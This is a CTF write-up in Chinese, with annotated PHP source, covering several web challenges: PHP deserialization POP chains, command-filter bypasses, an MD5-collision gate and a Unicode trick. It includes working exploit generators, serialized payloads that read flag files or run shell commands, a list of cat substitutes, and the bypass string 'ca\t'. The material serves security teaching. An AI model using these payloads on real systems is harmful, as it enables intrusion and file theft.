[MRCTF2020]Ezpop
Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    // Path handed to include(). Declared protected, so its serialized key is
    // "\0*\0var" (visible as %00%2A%00var in the URL-encoded payload later on).
    protected $var;

    /**
     * Sink: include() on a caller-controlled path. Whatever include() can
     * open (local files, or stream-wrapper URLs such as the php://filter one
     * used in the write-up below) is executed or read here.
     */
    public function append($value){
        include($value);
    }

    /**
     * Triggered when an instance is called as a function, e.g. $obj().
     * Forwards the stored $var to append(), so whoever controls $var in a
     * deserialized object controls the include() target.
     */
    public function __invoke(){
        $this->append($this->var);
    }
}
//文件包含漏洞,可以通过伪协议读取flag
//__invoke() 当脚本尝试将对象调用为函数时触发
//所以把Modifier类调用为函数
class Show{
    public $source;
    public $str;

    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }

    /**
     * Runs when the object is used as a string. Reads ->source on whatever
     * $str holds; if $str is an object without an accessible 'source'
     * property, that read is routed through its __get() (Test::__get below).
     */
    public function __toString(){
        return $this->str->source;
    }

    /**
     * Runs on unserialize(). This denylist is the only guard on the object
     * graph: it inspects $this->source alone (never $str), and passing an
     * object as the preg_match() subject is what invokes __toString() on it.
     * The scheme list also does not include php://.
     */
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}
//__toString 当一个对象被当作一个字符串被调用。
//__wakeup() 使用unserialize时触发
class Test{
    public $p;

    public function __construct(){
        $this->p = array();
    }

    /**
     * Runs on a read of an undefined or inaccessible property (Test has no
     * 'source'). Calls whatever $p holds as a function; for an object in $p
     * that is its __invoke() (Modifier::__invoke above). unserialize() does
     * not run __construct(), so the array() default gives a deserialized
     * instance no protection.
     */
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
//__get() 用于从不可访问的属性读取数据
//#难以访问包括:(1)私有属性,(2)没有初始化的属性
if(isset($_GET['pop'])){
    // Sink: unserialize() on raw request input with no allowed_classes
    // restriction. Every magic method above (__wakeup, __toString, __get,
    // __invoke) is reachable from the deserialized object graph; the '@'
    // only hides notices, it does not stop the chain.
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}
?>
pop链
首先反序列化,调用 __wakeup 方法,将 $this->source 实例化为 Show 类,就调用 __toString 方法,如果将 str 实例化为 Test,就能调用 __get 方法,将 __get 方法中的 p 赋值为 Modifier 类,就能调用 __invoke 方法,最终调用文件包含函数,读取 flag.php
<?php
// Stub with the same class name and property visibility as the target's
// Modifier, so serialize() emits the identical "\0*\0var" key; only the
// value differs. The target's __wakeup() never inspects this property.
class Modifier {
    protected $var="php://filter/read=convert.base64-encode/resource=flag.php";
}
// Stub of the target's Test without its constructor; $p is assigned directly below.
class Test{
    public $p;
}
// Stub of the target's Show. The constructor only wires a Test into $str,
// so both the outer and the inner instance built below carry one.
class Show{
    public $source;
    public $str;
    public function __construct(){
        $this->str = new Test();
    }
}
// Object graph: outer Show -> source (inner Show) -> str (Test) -> p (Modifier).
// urlencode() preserves the NUL bytes around the protected-property name in
// the query string (they show up as %00 in the output below).
$a = new Show();
$a->source = new Show();
$a->source->str->p = new Modifier();
echo urlencode(serialize($a));
运行结果:O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BN%3B%7D%7D
base64解码
序列化3
<?php
// error_reporting(0) silences every PHP warning and notice (e.g. the one
// unserialize() emits for malformed input); highlight_file() publishes this source.
error_reporting(0);
highlight_file(__FILE__);
class Person{
    public $username='peguin';
    public $password='123456';
    public $file;

    public function __construct($username,$password)
    {
        $this->username = $username;
        $this->password = $password;
    }

    /**
     * Runs when the object is destroyed, which for a deserialized instance
     * happens at the end of the request at the latest. Concatenating $file
     * into a string converts an object held in $file via its __toString()
     * (Human::__toString below) — the entry point of the chain.
     */
    public function __destruct()
    {
        // TODO: Implement __destruct() method.
        echo "your file is ".$this->file;
    }
}
class Human{
    public $a;

    public function __construct($a){
        $this->a = $a;
    }

    /**
     * Sink: system() on $a, whose output goes straight into the response.
     * The only control is a case-insensitive denylist of four literal
     * substrings; it does not normalise shell quoting or escaping before
     * matching, and a list of program names cannot be exhaustive. The
     * mitigation is to never pass untrusted data to system() (or to
     * allowlist fixed commands), not to extend the denylist.
     */
    public function __toString()
    {
        if(preg_match('/ls|cat|more|flag/i',$this->a)){
            // TODO: Implement __toString() method.
            die('姿势骚一点');
        }
        else{
            system($this->a);
        }
        return ("good");
    }
}
// Sink: unserialize() on raw request input, with no allowed_classes option
// and no integrity check on the payload. Any class defined above can be
// instantiated from the client, which is what makes __destruct() reachable.
$a = $_GET['code'];
unserialize($a);
?>
通过system函数读取flag
当cat被过滤时
more:一页一页的显示档案内容
less:与 more 类似;head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是cat 的反向显示
tail:查看尾几行;nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
grep 1、在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行。此时,可以使用如下命令: grep test *file strings
<?php
// Stub mirroring the target's Person (same name, same public properties in
// the same declaration order) so the serialized shape matches; no constructor needed.
class Person{
    public $username='peguin';
    public $password='123456';
    public $file;
}
// Stub of the target's Human; $a is assigned directly below.
class Human{
    public $a;
}
// PHP class names are case-insensitive, so new person()/new human() resolve
// to the Person/Human stubs above; serialize() still emits the declared
// names (see "Person"/"Human" in the output below).
$n=new person();
$n->file=new human();
$n->file->a='sort /fla\g';// read the file with sort
$c=serialize($n);
echo $c;
运行结果:O:6:"Person":3:{s:8:"username";s:6:"peguin";s:8:"password";s:6:"123456";s:4:"file";O:5:"Human":1:{s:1:"a";s:11:"sort /fla\g";}}
序列化4
<?php
// Publishes this source, then silences every PHP warning and notice.
highlight_file(__FILE__);
error_reporting(0);
class test{
    public $peguin;
    public $source;

    public function __construct($file){
        $this->source = $file;
        echo 'welcome to '.$this->source."<br>";
    }

    /**
     * Runs when the object is used as a string. Calls close() on $peguin;
     * if $peguin holds an object that defines no close() method, the call
     * is routed to that class's __call() (good::__call below).
     */
    public function __toString(){
        return $this->peguin->close();
    }

    /**
     * Runs on unserialize(). The denylist inspects $this->source only —
     * never $peguin — and passing an object as the preg_match() subject is
     * what invokes __toString() on it.
     */
    public function __wakeup(){
        if(preg_match('/http|file|data|dict|\.\./i',$this->source)){
            echo "hacker!";
            $this->source = "index.php";
        }
    }
}
class good{
    public $joker;

    /**
     * Runs for any call to an undefined method on this class (here close()).
     * Sink: system() on $joker with no filtering at all; $name and $param
     * are ignored.
     */
    public function __call($name,$param){
        system($this->joker);
    }
}
// Sink: unserialize() on raw request input, no allowed_classes option and
// no integrity check. Both classes above are instantiable from the client.
$a = $_GET['cmd'];
unserialize($a);
?>
__call 函数:当调用的方法不存在时触发
<?php
// Stub of the target's test without its constructor and magic methods;
// the property names and order match so the serialized shape does.
class test{
    public $peguin;
    public $source;
}
// Stub of the target's good; $joker is assigned directly below.
class good{
    public $joker;
}
// Object graph: outer test -> source (inner test) -> peguin (good).
// The outer __wakeup() check runs preg_match() against an object in
// $source, which is what triggers the inner test's __toString().
$a = new test();
$a->source=new test();
$a->source->peguin=new good();
$a->source->peguin->joker='ls';
echo serialize($a);
?>
先查看当前目录的文件
使用cat命令,页面无显示,这里用sort进行查看
$a->source->peguin->joker='sort flag.php';
运行结果:`O:4:"test":2:{s:6:"peguin";N;s:6:"source";O:4:"test":2:{s:6:"peguin";O:4:"good":1:{s:5:"joker";s:13:"sort flag.php";}s:6:"source";N;}}`
flag.php和flag.txt结果都一样
[安洵杯 2019]easy_web
网址中的img
经过了三重编码
hex->base64->base64
解码555.png
用index.php进行编码
得到TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
bp抓包
base64解码
<?php
// E_ALL || ~E_NOTICE is a boolean OR, so this passes true (i.e. 1 == E_ERROR),
// not the intended E_ALL & ~E_NOTICE; only fatal errors get reported.
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
// Redirect header without exit: the rest of the script still executes.
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
// img is base64(base64(hex(path))). After decoding, every byte outside
// [a-zA-Z0-9.] is removed (this strips path separators), and the only other
// check is a case-insensitive "flag" substring denylist.
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    // Sink: reads any readable local file not named *flag* and returns its
    // contents base64-encoded inside the <img> tag (this is how the source
    // of index.php was obtained in the write-up).
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
// $cmd is reflected into the HTML unescaped before any check below.
echo $cmd;
echo "<br>";
// Denylist of program names and shell metacharacters; it is a literal
// substring match on the raw string, so it is the only barrier before the
// backtick operator below. Allowlisting would be the real mitigation.
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    // Strict comparison: a and b must differ as strings yet hash identically,
    // i.e. an MD5 collision pair (one is shown below the listing). MD5 is
    // not collision resistant, so this gate is not a real control.
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        // Sink: the backtick operator runs $cmd through the shell and echoes its output.
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}
?>
<html>
<style>
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
MD5强类型比较
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
接着是正则匹配,这里过滤了较多语句
可以用ca\t%20/flag进行绕过
[ASIS 2019]Unicorn shop
进去之后是一个购买页面
前三种商品无法购买
第四种商品购买时只允许出现一个字符
此题考点为unicode编码安全问题
https://www.compart.com/en/unicode/
输入thousand
代表的是五千
注意url编码
输入框中输入即可